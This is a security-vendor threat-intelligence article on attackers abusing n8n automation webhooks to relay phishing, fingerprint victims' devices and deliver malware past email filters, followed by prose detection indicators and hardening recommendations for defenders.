Trusted Infrastructure Turned Weapon: How Threat Actors Are Hijacking n8n Automation to Bypass Email Security

Original research sourced and expanded from The Hacker News. CypherByte analysis represents independent assessment and expanded threat intelligence.

Executive Summary

Since at least October 2025, threat actors have been systematically abusing n8n — a widely adopted open-source AI workflow automation platform — to conduct sophisticated phishing campaigns that successfully bypass conventional email security controls. By embedding malicious logic inside legitimate, trusted automation infrastructure, these attackers have effectively turned productivity tooling into a covert delivery mechanism for malware payloads and device fingerprinting operations. Security teams relying on domain reputation, sender verification, or signature-based filtering alone are particularly exposed to this technique, as the attack traffic originates from infrastructure that most organizations implicitly trust.

This research is immediately relevant to security operations centers, email security architects, threat intelligence teams, and any organization that has deployed or permits third-party access to workflow automation platforms. The abuse of legitimate services for malicious delivery — a technique sometimes categorized under Living-off-Trusted-Sites (LoTS) — represents one of the most operationally challenging threat categories defenders face today. The n8n campaign is a textbook escalation of this approach, demonstrating that attackers are not just exploiting software vulnerabilities but actively engineering around trust models baked into enterprise security infrastructure.

Technical Analysis

The n8n platform, which allows users to construct complex automated workflows triggered by external events, exposes publicly accessible webhook endpoints as a core feature. In a legitimate deployment, these endpoints receive HTTP requests and trigger downstream automation tasks — sending emails, processing data, calling APIs, or executing scripts. Attackers in this campaign have registered or compromised n8n instances and constructed workflows specifically designed to serve as phishing relay infrastructure.

The attack chain, as assessed from available intelligence, operates in multiple stages. In the initial phase, victims receive phishing emails that either originate from or link through n8n-hosted infrastructure. Because n8n instances may run on well-regarded cloud providers or share infrastructure with legitimate enterprise deployments, the sending domains and IP ranges frequently carry favorable sender reputation scores. This allows the emails to pass through — or receive reduced scrutiny from — Secure Email Gateways (SEGs), SPF/DKIM validation layers, and threat intelligence blocklists.

Upon victim interaction — typically clicking a link — two distinct malicious outcomes have been observed. The first is device fingerprinting, where the n8n webhook silently collects browser telemetry, IP geolocation, User-Agent strings, installed font data, screen resolution, and other environmental signals. This reconnaissance data is passed back to attacker-controlled infrastructure to profile targets before deciding whether to escalate the attack or discard non-viable victims. The second outcome is direct malware payload delivery, where the automation workflow conditionally serves malicious files — potentially varying the payload based on the fingerprinting data already collected, enabling highly targeted delivery depending on the victim's operating system, browser, or corporate network indicators.

The workflow automation layer also provides attackers with an operationally convenient dead-drop and relay mechanism. Because n8n workflows can chain multiple external service calls, the actual command-and-control infrastructure can remain several hops removed from the initial phishing contact point, significantly complicating forensic attribution and infrastructure takedown efforts. Defenders attempting to block attack infrastructure by IP or domain face a moving target problem compounded by the shared and legitimate nature of the hosting environment.

Impact Assessment

The affected surface area is broad. Any organization whose employees receive external email — which is functionally every organization — is exposed to the phishing delivery component. Environments with permissive URL-filtering policies around known SaaS and automation platforms are at elevated risk, as n8n.io and self-hosted n8n subdomains may be explicitly whitelisted or carry automatic trust. Sectors that have been historically targeted by phishing-as-initial-access campaigns — financial services, healthcare, technology, and critical infrastructure — should treat this as an active and elevated threat.

For organizations that themselves operate n8n instances, there is an additional and serious secondary risk: reputational and legal exposure. If a self-hosted n8n deployment is compromised or misconfigured to allow unauthorized workflow creation, that organization's infrastructure could become an unwitting relay in attacks against third parties. This creates liability concerns and potential regulatory implications, particularly under frameworks like GDPR, HIPAA, and emerging U.S. state-level cybersecurity statutes. The real-world consequences extend beyond individual victim compromise to systemic erosion of trust in the workflow automation category as a class of enterprise tooling.

CypherByte's Perspective

This campaign reflects a broader and accelerating strategic shift in the threat landscape: attackers are increasingly investing in trust exploitation rather than technical exploitation. Zero-day vulnerabilities are expensive to acquire and burn quickly. Abusing a legitimate, well-maintained, and broadly trusted platform costs comparatively little, scales readily, and defeats security controls that billions of dollars of enterprise investment have been built to deliver. The n8n campaign is not an isolated incident — it sits within a lineage that includes abuse of Google Sites, Cloudflare Workers, Notion, GitHub, and dozens of other trusted platforms as phishing and malware delivery infrastructure.

From a mobile security perspective — a core focus of CypherByte's research mandate — this campaign carries specific implications that warrant attention. Mobile devices are disproportionately vulnerable to this attack pattern for several compounding reasons. Email clients on mobile platforms generally expose less URL metadata to end users, making it harder for a recipient to identify suspicious redirect chains passing through n8n infrastructure. Mobile browsers are typically less instrumented for enterprise security monitoring. And critically, the device fingerprinting component of this campaign is highly effective against mobile targets: the rich telemetry available from mobile browsers — including precise geolocation, device model, battery status APIs, and network type — provides attackers with exceptionally high-fidelity victim profiling. Organizations with BYOD policies or unmanaged mobile endpoints should treat this threat as directly applicable to their mobile fleet.

Indicators and Detection

Security teams should implement monitoring and detection logic targeting the following indicators and behavioral patterns associated with this campaign:

Network and Email Indicators: Look for outbound HTTP/HTTPS requests or inbound email links containing n8n.io/webhook/ paths or subdomains consistent with self-hosted n8n deployments (e.g., *.yourdomain.com/webhook/[UUID]). Webhook UUIDs in URLs arriving via email — particularly in unsolicited messages — should be treated as high-suspicion. Monitor for unusual POST requests carrying browser telemetry parameters (screen, fonts, timezone, plugins) to external automation endpoints.

Behavioral Detection: Email security platforms should flag messages containing links that redirect through workflow automation infrastructure prior to reaching a final destination. Chains of two or more redirects — especially those passing through known automation or no-code platforms — should trigger sandbox detonation regardless of the domain's reputation score. Endpoint detection solutions should flag processes spawned from browser interactions that exhibit post-exploitation behavior consistent with initial access payloads.

Internal n8n Instance Monitoring: Organizations running n8n should audit all active workflows for externally-triggered webhook definitions, particularly those with email-sending actions, file-serving capabilities, or external API calls to non-approved domains. Unauthorized workflow creation should generate immediate alerts.

Recommendations

1. Reassess trust assumptions for SaaS and automation platforms in email security policy. Explicitly whitelisted automation platform domains — including n8n.io and self-hosted equivalents — should be removed from bypass lists in Secure Email Gateways. All URLs should be subject to full inspection and sandboxed detonation regardless of domain reputation.

2. Deploy time-of-click URL scanning with redirect chain analysis. Static link analysis at email receipt is insufficient for this attack pattern. Implement solutions that re-evaluate URLs at the moment of user click, with full resolution of multi-hop redirect chains, to catch n8n relay infrastructure that may not have been flagged at delivery time.

3. Audit and harden all self-hosted n8n deployments immediately. Security teams should inventory all n8n instances within their environment. Enforce authentication on all webhook endpoints where possible, review all active workflows against an approved baseline, restrict outbound workflow actions to an approved destination allowlist, and ensure instances are not publicly accessible without authentication.

4. Extend mobile device management policy to address LoTS threats. Organizations should ensure that mobile email clients are covered by the same URL inspection and redirect analysis capabilities applied to desktop environments. Where technical controls are not feasible on unmanaged devices, compensating controls such as user awareness training specific to automation-platform-based phishing should be implemented.

5. Implement behavioral anomaly detection for browser telemetry exfiltration. Network monitoring should be tuned to identify HTTP requests carrying fingerprinting parameter sets — particularly from user endpoints following email link clicks. These requests, even when targeting trusted-appearing infrastructure, may represent the reconnaissance phase of a targeted attack.

6. Brief threat intelligence teams on the LoTS category broadly. The n8n campaign should be treated as a signal, not a singular event. Security teams should proactively model which other automation, collaboration, and productivity platforms within their environment could be abused under the same trust-exploitation framework, and pre-emptively apply appropriate detection and control logic.

CypherByte continues to monitor this campaign for infrastructure updates, new payload variants, and expansion to additional automation platforms. This analysis will be updated as new intelligence becomes available. Original reporting credit: The Hacker News.